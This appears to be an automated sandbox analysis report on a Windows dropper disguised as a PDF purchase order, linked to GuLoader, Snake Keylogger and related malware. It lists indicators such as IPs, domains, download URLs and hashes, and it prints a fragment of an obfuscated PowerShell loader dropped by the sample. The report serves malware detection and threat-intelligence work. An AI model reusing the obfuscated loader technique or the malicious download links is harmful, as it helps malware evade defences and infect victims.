Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Forbundsstater.exe, PID 7032 because it is empty
Execution Graph export aborted for target powershell.exe, PID 1864 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: LPO-9180155-PDF.exe

Simulations

Behavior and APIs

Time	Type	Description
04:13:04	API Interceptor	41x Sleep call for process: powershell.exe modified
04:13:55	API Interceptor	81x Sleep call for process: Forbundsstater.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	crst2.shop/HM341/index.php
	PMTI00002112.exe	Get hash	malicious	Azorult	Browse	bshd1.shop/OP341/index.php
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	crst2.shop/HM341/index.php
	MB9901717-PDF.exe	Get hash	malicious	Azorult, GuLoader	Browse	vlha.shop/LB341/index.php
	http://kjhjgfhjkfkhkhnjrgeiur97r0rg4.pages.dev/shawerror	Get hash	malicious	HTMLPhisher	Browse	kjhjgfhjkfkhkhnjrgeiur97r0rg4.pages.dev/shawerror
	Quotation.xls	Get hash	malicious	Remcos	Browse	tny.wtf/jk8Z5I
	NUEVO ORDEN01_202407238454854.pdf.exe	Get hash	malicious	FormBook	Browse	www.010101-11122-2222.cloud/rn94/?ndsLnTq=grMJGHTOpxQfD2iixWctBZvhCYtmqSbLUJDCoaQDnQJ3Rh8vFQmgv7kvDLvYcoaVSk1M&pPO=DFQxUrcpRxVH
	DRAFT AWB and DRAFT Commercial invoice.xls	Get hash	malicious	Remcos	Browse	tny.wtf/cyd
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/4jaIXkvS/download
	QUOTATION_JULQTRA071244.PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/PM6yPStj/download
108.167.181.251	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse
	PMTI00002112.exe	Get hash	malicious	Azorult	Browse
	Apixaban _August 2024.exe	Get hash	malicious	Azorult, GuLoader	Browse
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse
	Confirmation transfer AGS # 22-00379.exe	Get hash	malicious	FormBook, GuLoader	Browse
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse
	MB9901717-PDF.exe	Get hash	malicious	Azorult, GuLoader	Browse
	Confirmation transfer Note AGS # 22-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
132.226.247.73	Confirmation Order.js	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Deye Union - PO # 23081377.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Purchase Order POT-247110.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Purchase Order.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	checkip.dyndns.org/
	Purchase Order - P04737.xls	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Revised PI_2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	ORDER--GO289533005XXXX024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Purchase Order.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Confirmation Order.js	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	DSD876543456780000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Deye Union - PO # 23081377.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	rPO0977-6745.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	z1QuotationSheetVSAA6656776.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	rcrypt.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
checkip.dyndns.com	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	Confirmation Order.js	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	DSD876543456780000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Confirmation transfer Note AGS # 22-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	Deye Union - PO # 23081377.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	rPO0977-6745.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	z1QuotationSheetVSAA6656776.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	rcrypt.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
www.reap.skyestates.com.mt	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	PMTI00002112.exe	Get hash	malicious	Azorult	Browse	108.167.181.251
	Apixaban _August 2024.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	108.167.181.251
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	108.167.181.251
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	Confirmation transfer AGS # 22-00379.exe	Get hash	malicious	FormBook, GuLoader	Browse	108.167.181.251
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	MB9901717-PDF.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	Confirmation transfer Note AGS # 22-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	108.167.181.251

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UNIFIEDLAYER-AS-1US	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	PMTI00002112.exe	Get hash	malicious	Azorult	Browse	108.167.181.251
	Apixaban _August 2024.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	108.167.181.251
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	108.167.181.251
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	Confirmation transfer AGS # 22-00379.exe	Get hash	malicious	FormBook, GuLoader	Browse	108.167.181.251
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	MB9901717-PDF.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	LisectAVT_2403002C_14.exe	Get hash	malicious	AgentTesla	Browse	162.214.101.129
CLOUDFLARENETUS	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	188.114.97.3
	PMTI00002112.exe	Get hash	malicious	Azorult	Browse	188.114.97.3
	Apixaban _August 2024.exe	Get hash	malicious	Azorult, GuLoader	Browse	104.21.10.25
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	188.114.97.3
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	188.114.96.3
	MB9901717-PDF.exe	Get hash	malicious	Azorult, GuLoader	Browse	188.114.97.3
	MGL6070111-PDF.exe	Get hash	malicious	Azorult, GuLoader	Browse	188.114.96.3
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
UTMEMUS	Confirmation Order.js	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Deye Union - PO # 23081377.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Purchase Order POT-247110.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Purchase Order.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	132.226.247.73
	yIRn1ZmsQF.elf	Get hash	malicious	Unknown	Browse	128.169.78.63
	kHeNppYRgN.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Purchase Order - P04737.xls	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Confirmation Order.js	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Lisect_AVT_24003_G1B_21.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	Lisect_AVT_24003_G1B_21.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	Lisect_AVT_24003_G1B_127.exe	Get hash	malicious	PureLog Stealer	Browse	188.114.97.3
	DSD876543456780000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.W32.Lokibot.N.gen.Eldorado.28246.8151.exe	Get hash	malicious	Lokibot	Browse	188.114.97.3
	Deye Union - PO # 23081377.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
37f463bf4616ecd445d4a1937da06e19	Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse	108.167.181.251
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	PMTI00002112.exe	Get hash	malicious	Azorult	Browse	108.167.181.251
	Apixaban _August 2024.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	108.167.181.251
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	108.167.181.251
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	Confirmation transfer AGS # 22-00379.exe	Get hash	malicious	FormBook, GuLoader	Browse	108.167.181.251
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	MB9901717-PDF.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251

Process:	C:\Users\user\AppData\Local\Temp\Forbundsstater.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1039
Entropy (8bit):	5.353332853270839
Encrypted:	false
SSDEEP:	24:ML9E4KiE4Ko84qXKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKiHKoviYHKh3oPtHo6hAHKzeR
MD5:	A4AF0F36EC4E0C69DC0F860C891E8BBE
SHA1:	28DD81A1EDDF71CBCBF86DA986E047279EF097CD
SHA-256:	B038D4342E4DD96217BD90CFE32581FCCB381C5C2E6FF257CD32854F840D1FDE
SHA-512:	A675D3E9DB5BDD325A22E82C6BCDBD5409D7A34453DAAEB0E37206BE982C388547E1BDF22DC70393C69D0CE55635E2364502572C3AD2E6753A56A5C3893F6D69
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.840877972214509
Encrypted:	false
SSDEEP:	192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5:	106D01F562D751E62B702803895E93E0
SHA1:	CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256:	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512:	81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\Forbundsstater.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	878240
Entropy (8bit):	7.621504485226266
Encrypted:	false
SSDEEP:	24576:VYDoeMwkejuoLDlwnyGUew8Sfte+H8Hyr2pUTY:udMErL2n77SfXUyAuY
MD5:	3755CE1468A267B6E1084C8069B54A8C
SHA1:	5473FB79E1D8D4089A62A8E5FD120068AAC6BE59
SHA-256:	37F65665252E8B5CC41B3A3A8E2C539141F24F347A86332415A4E1AF69D5BC0C
SHA-512:	EE4E033434D63EC2EE237518ED559BCA014124E06D280634BBE135E49D5FEB018809E0FD473CDD8DD07E0C389C7339E96B1CAD755024E7C144F89F0037ECF5A4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 34%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.ju.ju.j..ujw.ju.+j..j..wjd.j!..j..j..,jt.jRichu.j........PE..L....f.R.................`.........X3.......p....@................................._........................................t...........Y...........N...............................................................p...............................text...f^.......`.................. ..`.rdata..T....p.......d..............@..@.data................x..............@....ndata...................................rsrc....Y.......Z...~..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Forbundsstater.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3szxrvmo.slg.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mrh50yc4.rav.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fernland.Reg

Download File

Process:	C:\Users\user\Desktop\LPO-9180155-PDF.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	75344
Entropy (8bit):	5.180747046238619
Encrypted:	false
SSDEEP:	1536:GsVx5h1638i5Ufshy/AFKJxattrAUf6chbFSfH4qH3iRX3aiowgjZ/BCTn:GsZ6MAishrFMatqUygZS5ygiEZAn
MD5:	9F2489A5F9DC4C48B682BCDA3585B928
SHA1:	096CD33FCEF7E89D24E1DC2DF261E9475B31177B
SHA-256:	09D6EED4F8921E3CF4DB895B765E7B563EC47DA63C6A52311FD38C485C388086
SHA-512:	84798F22C300E39D2659824F07382B90C2FAA53AB240825D9273F3751D3CBA99A327DB31FCBFF1A53B12E927D4462FA38755584349E5B953000BA80B57B25CAB
Malicious:	true
Preview:	$Klafternnsvarsreglerne=$Thrust;<#Brystes Aaremaalsstillinger Binderiets Detonering Recriticize Fuldender #><#windroad Bladkbmand Filmanmeldere #><#Nonrateably Udkommandering Aceanthrene oversigstabellernes Afregnendes Hermetik #><#Maleberry Enterotome Brougham #><#Copulate rbets Oversolidifying Chlorous Leveaarene Daadyrkllernes #><#Ligebenede Begavelser Moosebush Vafler Phosphamidon Colligate #>$Halstrkldets = "Photoco;Noteri `$Fac tioT oldtrsuAngaaetnChekibeiReg nsinMedlbergFoliofoePapndernRe eate=Onasflo`$.ladarnHAffugteoKnorhmnv,ersonleAflireddInsectikTtskrevaKneepa.rBladmavaSpaankuk ithyratP esbyteEnvejskrInstitusUn.ycan;Dovec,tFUnsp.nlu LlingenDueslagcSyna eptVvraneniF,dsvedoVebogavn F.tche ,evigatUS perfinUnders.dAttenereAnabasmrazuritevTelefonihemlocks.nmastenAngelikiPorteflnPewteregKyoodlisParfumeiBrneteanCosmatis,fsmagepTeleleceSenneppkVairfret predterNeutrone ByggesrProtovanNonanaleInter,o Preaffi(Slerswa`$Hase.kaPBechamerSeedlesoUntendefVisioneeNonedibtDis ayeeaeromanrSupe

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Hithermost.Hyp87

Download File

Process:	C:\Users\user\Desktop\LPO-9180155-PDF.exe
File Type:	dBase IV DBT, blocks size 0, block length 1024, next free block index 15990784, next free block 3132751987, next used block 5439488
Category:	dropped
Size (bytes):	352628
Entropy (8bit):	7.601589511227122
Encrypted:	false
SSDEEP:	6144:vZwllI1G3HyW1BUbtnbO0fReIzgBib+imn5rRt:villIgiWsOAeIMUb1mnR/
MD5:	56B97401E31E4C87A0C91F82D51C8707
SHA1:	8C1BE66A8B6F75ECC61A9A7B5F502B3E5DFD0AFA
SHA-256:	73FEB40E0940E438A217312631438CF6A68BB5486729681AC2F6C03F71594E4F
SHA-512:	CF28C7DF9999645BC0B60287AE950CF0A5220A60FEC2B50D1D50F070731525198D3E4E5CDC62E884A04E5E991921C16DF5152E265199A988AD574591DB95C070
Malicious:	false
Preview:	............................................&.....99999...}..t.......BB.....n..}}.]]]......###.........O......^^......q......@..........,.d.FF..&............222.p....q.............AAA........."""".............L............5...Q...KK..v...........e........g.W......./................f..++............................KKK.......................00...............P...r....................S......;;;;;.................................777.......q..........................9999.................................4444.......bb..................!........0.............\|\|......................D.............................J...NN..........nn..JJ......P..................................................\|\|\|......................q............B..............PP.........................Y.........@..<<<<<<<<.......r..........................................F...22.............................`..........T.........BB...N..S...........n.......^^......44....OOO......nnn..6..6...........#.OO......aaa....................

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\grensav.sjl

Download File

Process:	C:\Users\user\Desktop\LPO-9180155-PDF.exe
File Type:	data
Category:	dropped
Size (bytes):	629448
Entropy (8bit):	1.257234589035216
Encrypted:	false
SSDEEP:	1536:LD3CLXCvTm3+3JOgkFWZfcDkZLwWIE4pzswWg95LDsRgtlVkIRh:X3US6uZOgk2fcJl5FWy5LDEQlK0
MD5:	B9E5947712FA407B58A8527B52CE050E
SHA1:	9FD16F2F3569FF478C591E16A03EF65F7D63E57E
SHA-256:	30B60EB19A5E7A32DAB61A17C1BCA485D8040EE9488024AA031C0190A7DCB510
SHA-512:	BBCF1AC518547982928276E01EA61C26600A426EBD57928A82801F5ACBD8E2047359AC1CB41DEB0898CFB5D10BAA419C782C910830517C3F44F555963D6EEB9D
Malicious:	false
Preview:	....,......................................................................k............\..................................J.................................................}.......................R....................... ........k...........$.....................................................'............ ...............................I....................2................=.................................................................................................................d.................................................................g..............................................X.....................j............................................................................4....mJ..T...Z......................... ..................Y......Z.......................................U.............L....u..S......................................................U.................................U..................................................e.........................

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\lokalplanrammes.sus

Download File

Process:	C:\Users\user\Desktop\LPO-9180155-PDF.exe
File Type:	data
Category:	dropped
Size (bytes):	221081
Entropy (8bit):	1.2406328235167285
Encrypted:	false
SSDEEP:	768:+sNmrp+QYzgwtqzOh8mcMPPy14oMvFzm8w/Y8vnLXWY8UBiBXVO3FzxrFUHItn4x:Y9A/S50ytu8voKwH
MD5:	D0A61E12A7A27A4B719AB0C4B9F57B88
SHA1:	55A349C760BA7AF05C54934924E2C0289BB3FF24
SHA-256:	243221C7BE40D55E82FDF162332959F85DF94CAF3EC8BC550EEE0DE0FC814A64
SHA-512:	3F117A4C26DDC7200AF9A79E8965F4396D175B368FF372BC7210929B15BA43B56EF68C6870F914638EC49ADF18CB553DF4492F583485ECC954C0238CC1405670
Malicious:	false
Preview:	.....................I...............................................\..................................Y.............................^...............................................................=..........e........................C....P................................`...............-.........................'.........................................................M.........................D....................[@..........................................H..........A...........................................d.........Lk.........................H.......n..............................................................................................C.........................4...v........................JU........&..................................................................]..... ....................................N..............................'.............................^.........................................................................k...............*...............

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\ondskabsfuldhedernes.txt

Download File

Process:	C:\Users\user\Desktop\LPO-9180155-PDF.exe
File Type:	ASCII text, with very long lines (367), with CRLF line terminators
Category:	dropped
Size (bytes):	440
Entropy (8bit):	4.2802377004664205
Encrypted:	false
SSDEEP:	12:QEUc9mHApTzMcC94e7q6hDwyK2Xkj9rKZaq:l9JTMp7AyKykBrk
MD5:	9524154CFD936F21394F74D000856732
SHA1:	3A45FE1B1EAAE9A1CAF11CA59FEBA1B3DE8E0CA3
SHA-256:	8EE6AE6BD6F5AF379B359A0CDD7721AEAEE0989C4B61431F2EAB1240FBBA56A2
SHA-512:	4DA2F73D1D6F027B9C939785F63D6F75477F978AB7F8532D8395D5C5C346397E1E4B090CC815AA5F75E2629F81C1FD64B7246266331DBB26D3B0075CE4579250
Malicious:	false
Preview:	habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious deklinationen armiferous bryggerkar totaktsmotorernes ombudsmandsudtalelsers overtinsel metronidazole uldspind..unmortifiedness ildspaasttelserne plagiostomata klauss ryaerne carline,

C:\Users\user\AppData\Local\Temp\nsl302C.tmp

Download File

Process:	C:\Users\user\Desktop\LPO-9180155-PDF.exe
File Type:	data
Category:	dropped
Size (bytes):	1288671
Entropy (8bit):	3.9397977794903127
Encrypted:	false
SSDEEP:	12288:LillIgiWsOAeIMUb1mnRO0B7Lj65Cact5v:LilfiaAeI9b1mnRO0FLO4v
MD5:	3AE0E367F5FBC6ED925B6BC2F265CD55
SHA1:	81750529B76D271E379E4488439DB74926D78769
SHA-256:	35B1A218BA373F0AB164E400BAF04F40BDE34B6D85B10832BD7473F98EF093BC
SHA-512:	1845220BB6F9F4FE1799D2CE1BDE810F3CCA9ACC60659D0042C2882FB064DDD463DA46E69A2CFE46E2F9A854F09882B8FE8763F07FBDFD1F800EB3E6FAFF1319
Malicious:	false
Preview:	.%......,...................T...........$%.......%........................................................................................................................................................................................................................................G...f...............j...............................................................................................................................v...............3.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.621504485226266
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	LPO-9180155-PDF.exe
File size:	878'240 bytes
MD5:	3755ce1468a267b6e1084c8069b54a8c
SHA1:	5473fb79e1d8d4089a62a8e5fd120068aac6be59
SHA256:	37f65665252e8b5cc41b3a3a8e2c539141f24f347a86332415a4e1af69d5bc0c
SHA512:	ee4e033434d63ec2ee237518ed559bca014124e06d280634bbe135e49d5feb018809e0fd473cdd8dd07e0c389c7339e96b1cad755024e7c144f89f0037ecf5a4
SSDEEP:	24576:VYDoeMwkejuoLDlwnyGUew8Sfte+H8Hyr2pUTY:udMErL2n77SfXUyAuY
TLSH:	A315124572A2D990D8044E341607DB8ACFB2AE302E51EA973795B36FDF336C17A06397
